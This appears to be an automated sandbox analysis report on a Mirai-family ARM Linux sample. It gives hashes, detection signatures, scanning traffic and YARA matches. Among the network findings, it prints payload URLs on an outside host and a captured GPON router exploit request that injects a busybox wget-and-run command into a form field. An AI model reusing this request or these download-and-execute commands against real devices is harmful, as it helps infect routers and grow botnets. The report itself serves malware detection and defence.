Linux Analysis Report
5OGAx17mRN.elf

Overview

General Information

Sample Name: 5OGAx17mRN.elf
Original Sample Name: 22769c1fd6d4ee506a64408ffb831681.elf
Analysis ID: 1345559
MD5: 22769c1fd6d4ee506a64408ffb831681
SHA1: 0384e5802354b3a9086b02e28d560e1788a9739c
SHA256: 233b3551effe9319a0ea73aec9e36ce62e0d1029e57b10c3366a8c518748d073
Tags: 32, arm, elf, mirai

Detection

Mirai
Score: 72
Range: 0 - 100
Whitelisted: false

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample is packed with UPX
Uses known network protocols on non-standard ports
Sample contains only a LOAD segment without any section mappings
Yara signature match
Uses the "uname" system call to query kernel version information (possible evasion)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
ELF contains segments with high entropy indicating compressed/encrypted content

Classification

Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection

Source: 5OGAx17mRN.elf ReversingLabs: Detection: 26%
Source: 5OGAx17mRN.elf Virustotal: Detection: 25%

Networking

Source: unknown Network traffic detected: HTTP traffic on port 23 -> 43974
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 43978
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 43998
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44002
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44004
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44008
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44010
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44018
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44020
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44026
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44028
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44170
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44174
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44178
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44182
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 38140
Source: global traffic TCP traffic: 192.168.2.15:53324 -> 45.88.90.129:9902
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 185.73.42.211:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 170.114.38.110:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 212.40.87.251:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 95.75.123.59:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 67.157.248.112:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 45.3.78.129:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 35.202.125.165:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 112.130.60.192:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 152.40.69.87:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 16.2.90.11:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 67.187.172.124:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 83.55.180.126:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 124.26.38.52:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 43.101.108.110:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 63.122.37.214:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 48.165.70.195:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 210.25.248.228:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 92.164.148.117:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 197.44.240.163:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 168.146.1.92:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 147.66.125.83:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 78.21.224.203:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 178.217.36.222:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 36.120.22.243:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 158.183.111.70:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 144.241.231.45:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 48.115.176.245:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 124.203.68.156:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 141.234.70.60:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 104.44.132.57:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 92.197.116.10:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 87.85.126.28:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 173.57.166.123:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 150.32.63.122:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 95.41.52.185:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 39.149.192.24:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 143.18.202.129:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 156.158.238.180:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 197.195.120.92:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 190.132.157.33:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 58.232.255.218:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 149.234.145.201:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 16.63.84.18:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 38.31.216.169:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 79.188.54.173:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 65.83.52.85:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 74.43.159.11:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 32.170.57.254:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 190.95.209.23:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 130.118.74.230:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 131.244.246.144:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 100.251.116.247:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 139.58.55.233:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 169.156.117.97:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 105.162.14.34:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 57.119.38.189:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 163.71.47.75:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 207.120.146.38:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 88.224.173.185:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 102.177.30.49:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 58.10.191.6:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 58.236.37.13:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 143.189.173.90:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 88.151.68.103:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 17.92.232.191:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 173.46.107.209:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 170.121.30.5:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 114.102.214.65:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 4.146.180.194:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 184.182.48.4:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 44.166.89.121:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 27.53.84.122:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 37.166.50.10:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 143.63.48.193:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 1.27.112.116:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 83.237.245.112:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 44.43.218.66:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 86.192.65.172:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 48.224.145.114:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 116.204.184.108:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 94.123.158.18:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 159.216.178.75:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 129.91.247.148:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 101.22.254.43:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 109.56.251.60:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 53.213.112.229:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 112.130.151.252:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 32.241.72.64:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 97.239.198.147:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 37.204.53.49:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 120.230.59.1:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 155.4.78.255:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 129.21.221.127:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 111.151.176.113:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 39.76.124.179:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 37.188.24.20:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 159.157.160.80:2323
Source: /tmp/5OGAx17mRN.elf (PID: 5808) Socket: 127.0.0.1::512
Source: unknown DNS traffic detected: queries for: daisy.ubuntu.com
Source: unknown Network traffic detected: HTTP traffic on port 51466 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48044
Source: unknown Network traffic detected: HTTP traffic on port 41328 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57194 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54650 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39526 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49372
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32930
Source: unknown Network traffic detected: HTTP traffic on port 40072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37398
Source: unknown Network traffic detected: HTTP traffic on port 42434 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 47454 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60100
Source: unknown Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42736
Source: unknown Network traffic detected: HTTP traffic on port 44246 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60108
Source: unknown Network traffic detected: HTTP traffic on port 59102 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50476 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60104
Source: unknown Network traffic detected: HTTP traffic on port 59588 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37382
Source: unknown Network traffic detected: HTTP traffic on port 55722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38232
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47184
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39562
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48030
Source: unknown Network traffic detected: HTTP traffic on port 36886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38236
Source: unknown Network traffic detected: HTTP traffic on port 56998 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42340 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39566
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50310
Source: unknown Network traffic detected: HTTP traffic on port 49078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60114
Source: unknown Network traffic detected: HTTP traffic on port 40842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57346 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56512 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 40490 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59130
Source: unknown Network traffic detected: HTTP traffic on port 38806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48026
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52504
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51650
Source: unknown Network traffic detected: HTTP traffic on port 53034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53832
Source: unknown Network traffic detected: HTTP traffic on port 50488 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 45630 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53210 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35194
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40534
Source: unknown Network traffic detected: HTTP traffic on port 60254 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58290
Source: unknown Network traffic detected: HTTP traffic on port 51536 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51278 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42670
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53328
Source: unknown Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 47928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43600 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39288 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40490
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54654
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53322
Source: unknown Network traffic detected: HTTP traffic on port 44892 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 48612 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55504
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32862
Source: unknown Network traffic detected: HTTP traffic on port 37382 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 48314 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 40334 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 47482 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 47860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 47184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44844
Source: unknown Network traffic detected: HTTP traffic on port 35016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43514
Source: unknown Network traffic detected: HTTP traffic on port 49640 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43510
Source: unknown Network traffic detected: HTTP traffic on port 34780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39490
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56848
Source: unknown Network traffic detected: HTTP traffic on port 46386 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37438 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51156
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33702
Source: unknown Network traffic detected: HTTP traffic on port 41808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55510
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53336
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52004
Source: unknown Network traffic detected: HTTP traffic on port 33924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56850
Source: unknown Network traffic detected: HTTP traffic on port 39448 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41328
Source: unknown Network traffic detected: HTTP traffic on port 50812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41324
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41326
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40472
Source: unknown Network traffic detected: HTTP traffic on port 56486 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43982
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42650
Source: unknown Network traffic detected: HTTP traffic on port 51954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 32930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51438 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56532 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55524
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54676
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53344
Source: unknown Network traffic detected: HTTP traffic on port 37128 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 48350 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39008
Source: unknown Network traffic detected: HTTP traffic on port 36584 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53346
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51170
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42648
Source: unknown Network traffic detected: HTTP traffic on port 60798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 41890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41312
Source: unknown Network traffic detected: HTTP traffic on port 56164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43976
Source: unknown Network traffic detected: HTTP traffic on port 36296 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41310
Source: unknown Network traffic detected: HTTP traffic on port 45450 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39470
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37294
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53354
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38146
Source: unknown Network traffic detected: HTTP traffic on port 34390 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47094
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57710
Source: unknown Network traffic detected: HTTP traffic on port 35282 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38148
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54688
Source: unknown Network traffic detected: HTTP traffic on port 42344 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51180
Source: unknown Network traffic detected: HTTP traffic on port 33340 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55540
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56872
Source: unknown Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57158 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37426 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 33178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40450
Source: unknown Network traffic detected: HTTP traffic on port 34620 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 40608 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35692 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 45474 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 32978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44892
Source: unknown Network traffic detected: HTTP traffic on port 36960 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39066
Source: unknown Network traffic detected: HTTP traffic on port 48224 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 46226 -> 443
Source: unknown TCP traffic detected without corresponding DNS query
Source: 5OGAx17mRN.elf, 5808.1.00007f164c017000.00007f164c02d000.r-x.sdmp, 5OGAx17mRN.elf, 5810.1.00007f164c017000.00007f164c02d000.r-x.sdmp, 5OGAx17mRN.elf, 5815.1.00007f164c017000.00007f164c02d000.r-x.sdmp String found in binary or memory: http://45.88.90.129/bins/Rakitin.mips%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: 5OGAx17mRN.elf, 5815.1.00007f164c017000.00007f164c02d000.r-x.sdmp String found in binary or memory: http://45.88.90.129/bins/Rakitin.sh
Source: 5OGAx17mRN.elf String found in binary or memory: http://upx.sf.net
Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1 User-Agent: Hello, World Accept: */* Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 34 35 2e 38 38 2e 39 30 2e 31 32 39 2f 62 69 6e 73 2f 52 61 6b 69 74 69 6e 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.88.90.129/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0

System Summary

Source: 5810.1.00007f164c017000.00007f164c02d000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 5810.1.00007f164c017000.00007f164c02d000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5808.1.00007f164c017000.00007f164c02d000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 5808.1.00007f164c017000.00007f164c02d000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5815.1.00007f164c017000.00007f164c02d000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 5815.1.00007f164c017000.00007f164c02d000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: Process Memory Space: 5OGAx17mRN.elf PID: 5808, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: 5OGAx17mRN.elf PID: 5810, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: 5OGAx17mRN.elf PID: 5815, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: LOAD without section mappings Program segment: 0x8000
Source: classification engine Classification label: mal72.troj.evad.linELF@0/0@2/0

Data Obfuscation

Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 23 -> 43974
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 43978
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 43998
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44002
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44004
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44008
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44010
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44018
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44020
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44026
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44028
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44170
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44174
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44178
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44182
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 38140
Source: 5OGAx17mRN.elf Submission file: segment LOAD with 7.9704 entropy (max. 8.0)
Source: /tmp/5OGAx17mRN.elf (PID: 5808) Queries kernel information via 'uname'
Source: 5OGAx17mRN.elf, 5808.1.00005618872e4000.0000561887452000.rw-.sdmp, 5OGAx17mRN.elf, 5810.1.00005618872e4000.0000561887452000.rw-.sdmp, 5OGAx17mRN.elf, 5815.1.00005618872e4000.0000561887452000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: 5OGAx17mRN.elf, 5808.1.00007ffd3ade4000.00007ffd3ae05000.rw-.sdmp, 5OGAx17mRN.elf, 5810.1.00007ffd3ade4000.00007ffd3ae05000.rw-.sdmp, 5OGAx17mRN.elf, 5815.1.00007ffd3ade4000.00007ffd3ae05000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: 5OGAx17mRN.elf, 5808.1.00005618872e4000.0000561887452000.rw-.sdmp, 5OGAx17mRN.elf, 5810.1.00005618872e4000.0000561887452000.rw-.sdmp, 5OGAx17mRN.elf, 5815.1.00005618872e4000.0000561887452000.rw-.sdmp Binary or memory string: V!/etc/qemu-binfmt/arm
Source: 5OGAx17mRN.elf, 5808.1.00007ffd3ade4000.00007ffd3ae05000.rw-.sdmp, 5OGAx17mRN.elf, 5810.1.00007ffd3ade4000.00007ffd3ae05000.rw-.sdmp, 5OGAx17mRN.elf, 5815.1.00007ffd3ade4000.00007ffd3ae05000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/5OGAx17mRN.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/5OGAx17mRN.elf

Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match File source: dump.pcap, type: PCAP